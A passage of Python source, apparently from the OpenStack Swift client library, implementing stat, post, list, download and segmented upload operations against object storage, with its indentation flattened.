logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
raise SwiftError('Account not found', exc=err)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
else:
if not objects:
res = {
'action': 'stat_container',
'container': container,
'object': None,
'success': True,
}
try:
stats_future = self.thread_manager.container_pool.submit(
stat_container, options, container
)
items, headers = get_future_result(stats_future)
res.update({
'items': items,
'headers': headers
})
return res
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
raise SwiftError('Container %r not found' % container,
container=container, exc=err)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
else:
stat_futures = []
for stat_o in objects:
stat_future = self.thread_manager.object_dd_pool.submit(
self._stat_object, container, stat_o, options
)
stat_futures.append(stat_future)
return ResultsIterator(stat_futures)
@staticmethod
def _stat_object(conn, container, obj, options):
res = {
'action': 'stat_object',
'object': obj,
'container': container,
'success': True,
}
try:
items, headers = stat_object(conn, options, container, obj)
res.update({
'items': items,
'headers': headers
})
return res
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# Post related methods
#
def post(self, container=None, objects=None, options=None):
"""
Post operations on an account, container or list of objects
:param container: The container to make the post operation against.
:param objects: A list of object names (strings) or SwiftPostObject
instances containing an object name, and an
options dict (can be None) to override the options for
that individual post operation::
[
'object_name',
SwiftPostObject('object_name', options={...}),
...
]
The options dict is described below.
:param options: A dictionary containing options to override the global
options specified during the service object creation.
These options are applied to all post operations
performed by this call, unless overridden on a per
object basis. Possible options are given below::
{
'meta': [],
'header': [],
'read_acl': None, # For containers only
'write_acl': None, # For containers only
'sync_to': None, # For containers only
'sync_key': None # For containers only
}
:returns: Either a single result dictionary in the case of a post to a
container/account, or an iterator for returning the results
of posts to a list of objects.
:raises SwiftError:
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
res = {
'success': True,
'container': container,
'object': None,
'headers': {},
}
if not container:
res["action"] = "post_account"
if objects:
raise SwiftError('Objects specified without container')
else:
response_dict = {}
headers = split_headers(
options['meta'], 'X-Account-Meta-')
headers.update(
split_headers(options['header'], ''))
res['headers'] = headers
try:
post = self.thread_manager.container_pool.submit(
self._post_account_job, headers, response_dict
)
get_future_result(post)
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': response_dict
})
return res
raise SwiftError('Account not found', exc=err)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'response_dict': response_dict,
'traceback': traceback,
'error_timestamp': err_time
})
return res
if not objects:
res["action"] = "post_container"
response_dict = {}
headers = split_headers(
options['meta'], 'X-Container-Meta-')
headers.update(
split_headers(options['header'], ''))
if options['read_acl'] is not None:
headers['X-Container-Read'] = options['read_acl']
if options['write_acl'] is not None:
headers['X-Container-Write'] = options['write_acl']
if options['sync_to'] is not None:
headers['X-Container-Sync-To'] = options['sync_to']
if options['sync_key'] is not None:
headers['X-Container-Sync-Key'] = options['sync_key']
res['headers'] = headers
try:
post = self.thread_manager.container_pool.submit(
self._post_container_job, container,
headers, response_dict
)
get_future_result(post)
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'action': 'post_container',
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': response_dict
})
return res
raise SwiftError(
"Container '%s' not found" % container,
container=container, exc=err
)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'action': 'post_container',
'success': False,
'error': err,
'response_dict': response_dict,
'traceback': traceback,
'error_timestamp': err_time
})
return res
else:
post_futures = []
post_objects = self._make_post_objects(objects)
for post_object in post_objects:
obj = post_object.object_name
obj_options = post_object.options
response_dict = {}
headers = split_headers(
options['meta'], 'X-Object-Meta-')
# add header options to the headers object for the request.
headers.update(
split_headers(options['header'], ''))
if obj_options is not None:
if 'meta' in obj_options:
headers.update(
split_headers(
obj_options['meta'], 'X-Object-Meta-'
)
)
if 'header' in obj_options:
headers.update(
split_headers(obj_options['header'], '')
)
post = self.thread_manager.object_uu_pool.submit(
self._post_object_job, container, obj,
headers, response_dict
)
post_futures.append(post)
return ResultsIterator(post_futures)
@staticmethod
def _make_post_objects(objects):
post_objects = []
for o in objects:
if isinstance(o, string_types):
obj = SwiftPostObject(o)
post_objects.append(obj)
elif isinstance(o, SwiftPostObject):
post_objects.append(o)
else:
raise SwiftError(
"The post operation takes only strings or "
"SwiftPostObjects as input",
obj=o)
return post_objects
@staticmethod
def _post_account_job(conn, headers, result):
return conn.post_account(headers=headers, response_dict=result)
@staticmethod
def _post_container_job(conn, container, headers, result):
try:
res = conn.post_container(
container, headers=headers, response_dict=result)
except ClientException as err:
if err.http_status != 404:
raise
_response_dict = {}
res = conn.put_container(
container, headers=headers, response_dict=_response_dict)
result['post_put'] = _response_dict
return res
@staticmethod
def _post_object_job(conn, container, obj, headers, result):
res = {
'success': True,
'action': 'post_object',
'container': container,
'object': obj,
'headers': headers,
'response_dict': result
}
try:
conn.post_object(
container, obj, headers=headers, response_dict=result)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# List related methods
#
def list(self, container=None, options=None):
"""
List operations on an account, container.
:param container: The container to make the list operation against.
:param options: A dictionary containing options to override the global
options specified during the service object creation::
{
'long': False,
'prefix': None,
'delimiter': None,
'header': []
}
:returns: A generator for returning the results of the list operation
on an account or container. Each result yielded from the
generator is either a 'list_account_part' or
'list_container_part', containing part of the listing.
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
rq = Queue(maxsize=10) # Just stop list running away consuming memory
if container is None:
listing_future = self.thread_manager.container_pool.submit(
self._list_account_job, options, rq
)
else:
listing_future = self.thread_manager.container_pool.submit(
self._list_container_job, container, options, rq
)
res = get_from_queue(rq)
while res is not None:
yield res
res = get_from_queue(rq)
# Make sure the future has completed
get_future_result(listing_future)
@staticmethod
def _list_account_job(conn, options, result_queue):
marker = ''
error = None
req_headers = split_headers(options.get('header', []))
try:
while True:
_, items = conn.get_account(
marker=marker, prefix=options['prefix'],
headers=req_headers
)
if not items:
result_queue.put(None)
return
if options['long']:
for i in items:
name = i['name']
i['meta'] = conn.head_container(name)
res = {
'action': 'list_account_part',
'container': None,
'prefix': options['prefix'],
'success': True,
'listing': items,
'marker': marker,
}
result_queue.put(res)
marker = items[-1].get('name', items[-1].get('subdir'))
except ClientException as err:
traceback, err_time = report_traceback()
logger.exception(err)
if err.http_status != 404:
error = (err, traceback, err_time)
else:
error = (
SwiftError('Account not found', exc=err),
traceback, err_time
)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
error = (err, traceback, err_time)
res = {
'action': 'list_account_part',
'container': None,
'prefix': options['prefix'],
'success': False,
'marker': marker,
'error': error[0],
'traceback': error[1],
'error_timestamp': error[2]
}
result_queue.put(res)
result_queue.put(None)
@staticmethod
def _list_container_job(conn, container, options, result_queue):
marker = options.get('marker', '')
error = None
req_headers = split_headers(options.get('header', []))
try:
while True:
_, items = conn.get_container(
container, marker=marker, prefix=options['prefix'],
delimiter=options['delimiter'], headers=req_headers
)
if not items:
result_queue.put(None)
return
res = {
'action': 'list_container_part',
'container': container,
'prefix': options['prefix'],
'success': True,
'marker': marker,
'listing': items,
}
result_queue.put(res)
marker = items[-1].get('name', items[-1].get('subdir'))
except ClientException as err:
traceback, err_time = report_traceback()
logger.exception(err)
if err.http_status != 404:
error = (err, traceback, err_time)
else:
error = (
SwiftError(
'Container %r not found' % container,
container=container, exc=err
),
traceback,
err_time
)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
error = (err, traceback, err_time)
res = {
'action': 'list_container_part',
'container': container,
'prefix': options['prefix'],
'success': False,
'marker': marker,
'error': error[0],
'traceback': error[1],
'error_timestamp': error[2]
}
result_queue.put(res)
result_queue.put(None)
# Download related methods
#
def download(self, container=None, objects=None, options=None):
"""
Download operations on an account, optional container and optional list
of objects.
:param container: The container to download from.
:param objects: A list of object names to download (a list of strings).
:param options: A dictionary containing options to override the global
options specified during the service object creation::
{
'yes_all': False,
'marker': '',
'prefix': None,
'no_download': False,
'header': [],
'skip_identical': False,
'out_directory': None,
'checksum': True,
'out_file': None,
'remove_prefix': False,
'shuffle' : False
}
:returns: A generator for returning the results of the download
operations. Each result yielded from the generator is a
'download_object' dictionary containing the results of an
individual file download.
:raises ClientException:
:raises SwiftError:
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
if not container:
# Download everything if options['yes_all'] is set
if options['yes_all']:
try:
options_copy = deepcopy(options)
options_copy["long"] = False
for part in self.list(options=options_copy):
if part["success"]:
containers = [i['name'] for i in part["listing"]]
if options['shuffle']:
shuffle(containers)
for con in containers:
for res in self._download_container(
con, options_copy):
yield res
else:
raise part["error"]
# If we see a 404 here, the listing of the account failed
except ClientException as err:
if err.http_status != 404:
raise
raise SwiftError('Account not found', exc=err)
elif objects is None:
if '/' in container:
raise SwiftError('\'/\' in container name',
container=container)
for res in self._download_container(container, options):
yield res
else:
if '/' in container:
raise SwiftError('\'/\' in container name',
container=container)
if options['out_file'] and len(objects) > 1:
options['out_file'] = None
o_downs = [
self.thread_manager.object_dd_pool.submit(
self._download_object_job, container, obj, options
) for obj in objects
]
for o_down in interruptable_as_completed(o_downs):
yield o_down.result()
def _download_object_job(self, conn, container, obj, options):
out_file = options['out_file']
results_dict = {}
req_headers = split_headers(options['header'], '')
pseudodir = False
path = join(container, obj) if options['yes_all'] else obj
path = path.lstrip(os_path_sep)
options['skip_identical'] = (options['skip_identical'] and
out_file != '-')
if options['prefix'] and options['remove_prefix']:
path = path[len(options['prefix']):].lstrip('/')
if options['out_directory']:
path = os.path.join(options['out_directory'], path)
if options['skip_identical']:
filename = out_file if out_file else path
try:
fp = open(filename, 'rb', DISK_BUFFER)
except IOError:
pass
else:
with fp:
md5sum = md5()
while True:
data = fp.read(DISK_BUFFER)
if not data:
break
md5sum.update(data)
req_headers['If-None-Match'] = md5sum.hexdigest()
try:
start_time = time()
get_args = {'resp_chunk_size': DISK_BUFFER,
'headers': req_headers,
'response_dict': results_dict}
if options['skip_identical']:
# Assume the file is a large object; if we're wrong, the query
# string is ignored and the If-None-Match header will trigger
# the behavior we want
get_args['query_string'] = 'multipart-manifest=get'
try:
headers, body = conn.get_object(container, obj, **get_args)
except ClientException as e:
if not options['skip_identical']:
raise
if e.http_status != 304: # Only handling Not Modified
raise
headers = results_dict['headers']
if 'x-object-manifest' in headers:
# DLO: most likely it has more than one page worth of
# segments and we have an empty file locally
body = []
elif config_true_value(headers.get('x-static-large-object')):
# SLO: apparently we have a copy of the manifest locally?
# provide no chunking data to force a fresh download
body = [b'[]']
else:
# Normal object: let it bubble up
raise
if options['skip_identical']:
if config_true_value(headers.get('x-static-large-object')) or \
'x-object-manifest' in headers:
# The request was chunked, so stitch it back together
chunk_data = self._get_chunk_data(conn, container, obj,
headers, b''.join(body))
else:
chunk_data = None
if chunk_data is not None:
if self._is_identical(chunk_data, filename):
raise ClientException('Large object is identical',
http_status=304)
# Large objects are different; start the real download
del get_args['query_string']
get_args['response_dict'].clear()
headers, body = conn.get_object(container, obj, **get_args)
headers_receipt = time()
obj_body = _SwiftReader(path, body, headers,
options.get('checksum', True))
no_file = options['no_download']
if out_file == "-" and not no_file:
res = {
'action': 'download_object',
'container': container,
'object': obj,
'path': path,
'pseudodir': pseudodir,
'contents': obj_body
}
return res
fp = None
try:
content_type = headers.get('content-type', '').split(';', 1)[0]
if content_type in KNOWN_DIR_MARKERS:
make_dir = not no_file and out_file != "-"
if make_dir and not isdir(path):
mkdirs(path)
else:
make_dir = not (no_file or out_file)
if make_dir:
dirpath = dirname(path)
if dirpath and not isdir(dirpath):
mkdirs(dirpath)
if not no_file:
if out_file:
fp = open(out_file, 'wb', DISK_BUFFER)
else:
if basename(path):
fp = open(path, 'wb', DISK_BUFFER)
else:
pseudodir = True
for chunk in obj_body:
if fp is not None:
fp.write(chunk)
finish_time = time()
finally:
bytes_read = obj_body.bytes_read()
if fp is not None:
fp.close()
if ('x-object-meta-mtime' in headers and not no_file
and not options['ignore_mtime']):
try:
mtime = float(headers['x-object-meta-mtime'])
except ValueError:
pass # no real harm; couldn't trust it anyway
else:
if options['out_file']:
utime(options['out_file'], (mtime, mtime))
else:
utime(path, (mtime, mtime))
res = {
'action': 'download_object',
'success': True,
'container': container,
'object': obj,
'path': path,
'pseudodir': pseudodir,
'start_time': start_time,
'finish_time': finish_time,
'headers_receipt': headers_receipt,
'auth_end_time': conn.auth_end_time,
'read_length': bytes_read,
'attempts': conn.attempts,
'response_dict': results_dict
}
return res
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res = {
'action': 'download_object',
'container': container,
'object': obj,
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': results_dict,
'path': path,
'pseudodir': pseudodir,
'attempts': conn.attempts
}
return res
def _submit_page_downloads(self, container, page_generator, options):
try:
list_page = next(page_generator)
except StopIteration:
return None
if list_page["success"]:
objects = [o["name"] for o in list_page["listing"]]
if options["shuffle"]:
shuffle(objects)
o_downs = [
self.thread_manager.object_dd_pool.submit(
self._download_object_job, container, obj, options
) for obj in objects
]
return o_downs
else:
raise list_page["error"]
def _download_container(self, container, options):
_page_generator = self.list(container=container, options=options)
try:
next_page_downs = self._submit_page_downloads(
container, _page_generator, options
)
except ClientException as err:
if err.http_status != 404:
raise
raise SwiftError(
'Container %r not found' % container,
container=container, exc=err
)
error = None
while next_page_downs:
page_downs = next_page_downs
next_page_downs = None
# Start downloading the next page of list results when
# we have completed 80% of the previous page
next_page_triggered = False
next_page_trigger_point = 0.8 * len(page_downs)
page_results_yielded = 0
for o_down in interruptable_as_completed(page_downs):
yield o_down.result()
# Do we need to start the next set of downloads yet?
if not next_page_triggered:
page_results_yielded += 1
if page_results_yielded >= next_page_trigger_point:
try:
next_page_downs = self._submit_page_downloads(
container, _page_generator, options
)
except ClientException as err:
# Allow the current page to finish downloading
logger.exception(err)
error = err
except Exception:
# Something unexpected went wrong - cancel
# remaining downloads
for _d in page_downs:
_d.cancel()
raise
finally:
# Stop counting and testing
next_page_triggered = True
if error:
raise error
# Upload related methods
#
def upload(self, container, objects, options=None):
"""
Upload a list of objects to a given container.
:param container: The container (or pseudo-folder path) to put the
uploads into.
:param objects: A list of file/directory names (strings) or
SwiftUploadObject instances containing a source for the
created object, an object name, and an options dict
(can be None) to override the options for that
individual upload operation::
[
'/path/to/file',
SwiftUploadObject('/path', object_name='obj1'),
...
]
The options dict is as described below.
The SwiftUploadObject source may be one of:
* A file-like object (with a read method)
* A string containing the path to a local
file or directory
* None, to indicate that we want an empty object
:param options: A dictionary containing options to override the global
options specified during the service object creation.
These options are applied to all upload operations
performed by this call, unless overridden on a per
object basis. Possible options are given below::
{
'meta': [],
'header': [],
'segment_size': None,
'use_slo': False,
'segment_container': None,
'leave_segments': False,
'changed': None,
'skip_identical': False,
'fail_fast': False,
'dir_marker': False # Only for None sources
}
:returns: A generator for returning the results of the uploads.
:raises SwiftError:
:raises ClientException:
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
try:
segment_size = int(0 if options['segment_size'] is None else
options['segment_size'])
except ValueError:
raise SwiftError('Segment size should be an integer value')
# Incase we have a psudeo-folder path for <container> arg, derive
# the container name from the top path and prepend the rest to
# the object name. (same as passing --object-name).
container, _sep, pseudo_folder = container.partition('/')
# Try to create the container, just in case it doesn't exist. If this
# fails, it might just be because the user doesn't have container PUT
# permissions, so we'll ignore any error. If there's really a problem,
# it'll surface on the first object PUT.
policy_header = {}
_header = split_headers(options["header"])
if POLICY in _header:
policy_header[POLICY] = \
_header[POLICY]
create_containers = [
self.thread_manager.container_pool.submit(
self._create_container_job, container, headers=policy_header)
]
# wait for first container job to complete before possibly attempting
# segment container job because segment container job may attempt
# to HEAD the first container
for r in interruptable_as_completed(create_containers):
res = r.result()
yield res
if segment_size:
seg_container = container + '_segments'
if options['segment_container']:
seg_container = options['segment_container']
if seg_container != container:
if not policy_header:
# Since no storage policy was specified on the command
# line, rather than just letting swift pick the default
# storage policy, we'll try to create the segments
# container with the same policy as the upload container
create_containers = [
self.thread_manager.container_pool.submit(
self._create_container_job, seg_container,
policy_source=container
)
]
else:
create_containers = [
self.thread_manager.container_pool.submit(
self._create_container_job, seg_container,
headers=policy_header
)
]
for r in interruptable_as_completed(create_containers):
res = r.result()
yield res
# We maintain a results queue here and a separate thread to monitor
# the futures because we want to get results back from potential
# segment uploads too
rq = Queue()
file_jobs = {}
upload_objects = self._make_upload_objects(objects, pseudo_folder)
for upload_object in upload_objects:
s = upload_object.source
o = upload_object.object_name
o_opts = upload_object.options
details = {'action': 'upload', 'container': container}
if o_opts is not None:
object_options = deepcopy(options)
object_options.update(o_opts)
else:
object_options = options
if hasattr(s, 'read'):
# We've got a file like object to upload to o
file_future = self.thread_manager.object_uu_pool.submit(
self._upload_object_job, container, s, o, object_options
)
details['file'] = s
details['object'] = o
file_jobs[file_future] = details
elif s is not None:
# We've got a path to upload to o
details['path'] = s
details['object'] = o
if isdir(s):
dir_future = self.thread_manager.object_uu_pool.submit(
self._create_dir_marker_job, container, o,
object_options, path=s
)
file_jobs[dir_future] = details
else:
try:
stat(s)
file_future = \
self.thread_manager.object_uu_pool.submit(
self._upload_object_job, container, s, o,
object_options, results_queue=rq
)
file_jobs[file_future] = details
except OSError as err:
# Avoid tying up threads with jobs that will fail
traceback, err_time = report_traceback()
logger.exception(err)
res = {
'action': 'upload_object',
'container': container,
'object': o,
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'path': s
}
rq.put(res)
else:
# Create an empty object (as a dir marker if is_dir)
details['file'] = None
details['object'] = o
if object_options['dir_marker']:
dir_future = self.thread_manager.object_uu_pool.submit(
self._create_dir_marker_job, container, o,
object_options
)
file_jobs[dir_future] = details
else:
file_future = self.thread_manager.object_uu_pool.submit(
self._upload_object_job, container, StringIO(),
o, object_options
)
file_jobs[file_future] = details
# Start a thread to watch for upload results
Thread(
target=self._watch_futures, args=(file_jobs, rq)
).start()
# yield results as they become available, including those from
# segment uploads.
res = get_from_queue(rq)
cancelled = False
while res is not None:
yield res
if not res['success']:
if not cancelled and options['fail_fast']:
cancelled = True
for f in file_jobs:
f.cancel()
res = get_from_queue(rq)
@staticmethod
def _make_upload_objects(objects, pseudo_folder=''):
upload_objects = []
for o in objects:
if isinstance(o, string_types):
obj = SwiftUploadObject(o, urljoin(pseudo_folder,
o.lstrip('/')))
upload_objects.append(obj)
elif isinstance(o, SwiftUploadObject):
o.object_name = urljoin(pseudo_folder, o.object_name)
upload_objects.append(o)
else:
raise SwiftError(
"The upload operation takes only strings or "
"SwiftUploadObjects as input",
obj=o)
return upload_objects
@staticmethod
def _create_container_job(
conn, container, headers=None, policy_source=None):
"""
Create a container using the given connection
:param conn: The swift connection used for requests.
:param container: The container name to create.
:param headers: An optional dict of headers for the
put_container request.
:param policy_source: An optional name of a container whose policy we
should duplicate.
:return: A dict containing the results of the operation.
"""
res = {
'action': 'create_container',
'container': container,
'headers': headers
}
create_response = {}
try:
if policy_source is not None:
_meta = conn.head_container(policy_source)
if 'x-storage-policy' in _meta:
policy_header = {
POLICY: _meta.get('x-storage-policy')
}
if headers is None:
headers = policy_header
else:
headers.update(policy_header)
conn.put_container(
container, headers, response_dict=create_response
)
res.update({
'success': True,
'response_dict': create_response
})
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': create_response
})
return res
@staticmethod
def _create_dir_marker_job(conn, container, obj, options, path=None):
res = {
'action': 'create_dir_marker',
'container': container,
'object': obj,
'path': path
}
results_dict = {}
if obj.startswith('./') or obj.startswith('.\\'):
obj = obj[2:]
if obj.startswith('/'):
obj = obj[1:]
if path is not None:
put_headers = {'x-object-meta-mtime': "%f" % getmtime(path)}
else:
put_headers = {'x-object-meta-mtime': "%f" % round(time())}
res['headers'] = put_headers
if options['changed']:
try:
headers = conn.head_object(container, obj)
ct = headers.get('content-type', '').split(';', 1)[0]
cl = int(headers.get('content-length'))
et = headers.get('etag')
mt = headers.get('x-object-meta-mtime')
if (ct in KNOWN_DIR_MARKERS and
cl == 0 and
et == EMPTY_ETAG and
mt == put_headers['x-object-meta-mtime']):
res['success'] = True
return res
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
try:
conn.put_object(container, obj, '', content_length=0,
content_type=KNOWN_DIR_MARKERS[0],
headers=put_headers,
response_dict=results_dict)
res.update({
'success': True,
'response_dict': results_dict})
return res
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': results_dict})
return res
@staticmethod
def _upload_segment_job(conn, path, container, segment_name, segment_start,
segment_size, segment_index, obj_name, options,
results_queue=None):
results_dict = {}
if options['segment_container']:
segment_container = options['segment_container']
else:
segment_container = container + '_segments'
res = {
'action': 'upload_segment',
'for_container': container,
'for_object': obj_name,
'segment_index': segment_index,
'segment_size': segment_size,
'segment_location': '/%s/%s' % (segment_container,
segment_name),
'log_line': '%s segment %s' % (obj_name, segment_index),
}
fp = None
try:
fp = open(path, 'rb', DISK_BUFFER)
fp.seek(segment_start)
contents = LengthWrapper(fp, segment_size, md5=options['checksum'])
etag = conn.put_object(
segment_container,
segment_name,
contents,
content_length=segment_size,
content_type='application/swiftclient-segment',
response_dict=results_dict)
if options['checksum'] and etag and etag != contents.get_md5sum():
raise SwiftError('Segment {0}: upload verification failed: '
'md5 mismatch, local {1} != remote {2} '
'(remote segment has not been removed)'
.format(segment_index,
contents.get_md5sum(),
etag))
res.update({
'success': True,
'response_dict': results_dict,
'segment_etag': etag,
'attempts': conn.attempts
})
if results_queue is not None:
results_queue.put(res)
return res
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': results_dict,
'attempts': conn.attempts
})
if results_queue is not None:
results_queue.put(res)
return res
finally:
if fp is not None:
fp.close()
def _get_chunk_data(self, conn, container, obj, headers, manifest=None):
chunks = []
if 'x-object-manifest' in headers:
scontainer, sprefix = headers['x-object-manifest'].split('/', 1)
for part in self.list(scontainer, {'prefix': sprefix}):
if part["success"]:
chunks.extend(part["listing"])
else:
raise part["error"]
elif config_true_value(headers.get('x-static-large-object')):
if manifest is None:
headers, manifest = conn.get_object(
container, obj, query_string='multipart-manifest=get')
manifest = parse_api_response(headers, manifest)
for chunk in manifest:
if chunk.get('sub_slo'):
scont, sobj = chunk['name'].lstrip('/').split('/', 1)
chunks.extend(self._get_chunk_data(
conn, scont, sobj, {'x-static-large-object': True}))
else:
chunks.append(chunk)
else:
chunks.append({'hash': headers.get('etag').strip('"'),
'bytes': int(headers.get('content-length'))})
return chunks
def _is_identical(self, chunk_data, path):
if path is None:
return False
try:
fp = open(path, 'rb', DISK_BUFFER)
except IOError:
return False
with fp:
for chunk in chunk_data:
to_read = chunk['bytes']
md5sum = md5()
while to_read:
data = fp.read(min(DISK_BUFFER, to_read))
if not data:
return False
md5sum.update(data)
to_read -= len(data)
if md5sum.hexdigest() != chunk['hash']:
return False
# Each chunk is verified; check that we're at the end of the file
return not fp.read(1)
def _upload_object_job(self, conn, container, source, obj, options,
results_queue=None):
if obj.startswith('./') or obj.startswith('.\\'):
obj = obj[2:]
if obj.startswith('/'):
obj = obj[1:]
res = {
'action': 'upload_object',
'container': container,
'object': obj
}
if hasattr(source, 'read'):
stream = source
path = None
else:
path = source
res['path'] = path
try:
if path is not None:
put_headers = {'x-object-meta-mtime': "%f" % getmtime(path)}
else:
put_headers = {'x-object-meta-mtime': "%f" % round(time())}
res['headers'] = put_headers
# We need to HEAD all objects now in case we're overwriting a
# manifest object and need to delete the old segments
# ourselves.
old_manifest = None
old_slo_manifest_paths = []
new_slo_manifest_paths = set()
segment_size = int(0 if options['segment_size'] is None
else options['segment_size'])
if (options['changed'] or options['skip_identical']
or not options['leave_segments']):
try:
headers = conn.head_object(container, obj)
is_slo = config_true_value(
headers.get('x-static-large-object'))
if options['skip_identical'] or (
is_slo and not options['leave_segments']):
chunk_data = self._get_chunk_data(
conn, container, obj, headers)
if options['skip_identical'] and self._is_identical(
chunk_data, path):
res.update({
'success': True,
'status': 'skipped-identical'
})
return res
cl = int(headers.get('content-length'))
mt = headers.get('x-object-meta-mtime')
if (path is not None and options['changed']
and cl == getsize(path)
and mt == put_headers['x-object-meta-mtime']):
res.update({
'success': True,
'status': 'skipped-changed'
})
return res
if not options['leave_segments']:
old_manifest = headers.get('x-object-manifest')
if is_slo:
for old_seg in chunk_data:
seg_path = old_seg['name'].lstrip('/')
if isinstance(seg_path, text_type):
seg_path = seg_path.encode('utf-8')
old_slo_manifest_paths.append(seg_path)
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# Merge the command line header options to the put_headers
put_headers.update(split_headers(options['header'], ''))
# Don't do segment job if object is not big enough, and never do
# a segment job if we're reading from a stream - we may fail if we
# go over the single object limit, but this gives us a nice way
# to create objects from memory
if (path is not None and segment_size
and (getsize(path) > segment_size)):
res['large_object'] = True
seg_container = container + '_segments'
if options['segment_container']:
seg_container = options['segment_container']
full_size = getsize(path)
segment_futures = []
segment_pool = self.thread_manager.segment_pool
segment = 0
segment_start = 0
while segment_start < full_size:
if segment_start + segment_size > full_size:
segment_size = full_size - segment_start
if options['use_slo']:
segment_name = '%s/slo/%s/%s/%s/%08d' % (
obj, put_headers['x-object-meta-mtime'],
full_size, options['segment_size'], segment
)
else:
segment_name = '%s/%s/%s/%s/%08d' % (
obj, put_headers['x-object-meta-mtime'],
full_size, options['segment_size'], segment
)
seg = segment_pool.submit(
self._upload_segment_job, path, container,
segment_name, segment_start, segment_size, segment,
obj, options, results_queue=results_queue
)
segment_futures.append(seg)
segment += 1
segment_start += segment_size
segment_results = []
errors = False
exceptions = []
for f in interruptable_as_completed(segment_futures):
try:
r = f.result()
if not r['success']:
errors = True
segment_results.append(r)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
errors = True
exceptions.append((err, traceback, err_time))
if errors:
err = ClientException(
'Aborting manifest creation '
'because not all segments could be uploaded. %s/%s'
% (container, obj))
res.update({
'success': False,
'error': err,
'exceptions': exceptions,
'segment_results': segment_results
})
return res
res['segment_results'] = segment_results
if options['use_slo']:
segment_results.sort(key=lambda di: di['segment_index'])
for seg in segment_results:
seg_loc = seg['segment_location'].lstrip('/')
if isinstance(seg_loc, text_type):
seg_loc = seg_loc.encode('utf-8')
new_slo_manifest_paths.add(seg_loc)
manifest_data = json.dumps([
{
'path': d['segment_location'],
'etag': d['segment_etag'],
'size_bytes': d['segment_size']
} for d in segment_results
])
mr = {}
conn.put_object(
container, obj, manifest_data,
headers=put_headers,
query_string='multipart-manifest=put',
response_dict=mr
)
res['manifest_response_dict'] = mr
else:
new_object_manifest = '%s/%s/%s/%s/%s/' % (
quote(seg_container.encode('utf8')),
quote(obj.encode('utf8')),
put_headers['x-object-meta-mtime'], full_size,
options['segment_size'])
if old_manifest and old_manifest.rstrip('/') == \
new_object_manifest.rstrip('/'):
old_manifest = None
put_headers['x-object-manifest'] = new_object_manifest
mr = {}
conn.put_object(
container, obj, '', content_length=0,
headers=put_headers,
response_dict=mr
)
res['manifest_response_dict'] = mr
else:
res['large_object'] = False
obr = {}
fp = None
try:
if path is not None:
content_length = getsize(path)
fp = open(path, 'rb', DISK_BUFFER)
contents = LengthWrapper(fp,
content_length,
md5=options['checksum'])
else:
content_length = None
contents = ReadableToIterable(stream,
md5=options['checksum'])
etag = conn.put_object(
container, obj, contents,
content_length=content_length, headers=put_headers,
response_dict=obr
)
res['response_dict'] = obr
if (options['checksum'] and
etag and etag != contents.get_md5sum()):
raise SwiftError(
'Object upload verification failed: '
'md5 mismatch, local {0} != remote {1} '
'(remote object has not been removed)'
.format(contents.get_md5sum(), etag))
finally:
if fp is not None:
fp.close()
if old_manifest or old_slo_manifest_paths:
drs = []
delobjsmap = {}
if old_manifest:
scontainer, sprefix = old_manifest.split('/', 1)
sprefix = sprefix.rstrip('/') + '/'
delobjsmap[scontainer] = []
for part in self.list(scontainer, {'prefix': sprefix}):
if not part["success"]:
raise part["error"]
delobjsmap[scontainer].extend(
seg['name'] for seg in part['listing'])
if old_slo_manifest_paths:
for seg_to_delete in old_slo_manifest_paths:
if seg_to_delete in new_slo_manifest_paths:
continue
scont, sobj = \
seg_to_delete.split(b'/', 1)
delobjs_cont = delobjsmap.get(scont, [])
delobjs_cont.append(sobj)
delobjsmap[scont] = delobjs_cont
del_segs = []
for dscont, dsobjs in delobjsmap.items():
for dsobj in dsobjs:
del_seg = self.thread_manager.segment_pool.submit(
self._delete_segment, dscont, dsobj,
results_queue=results_queue
)
del_segs.append(del_seg)
for del_seg in interruptable_as_completed(del_segs):
drs.append(del_seg.result())
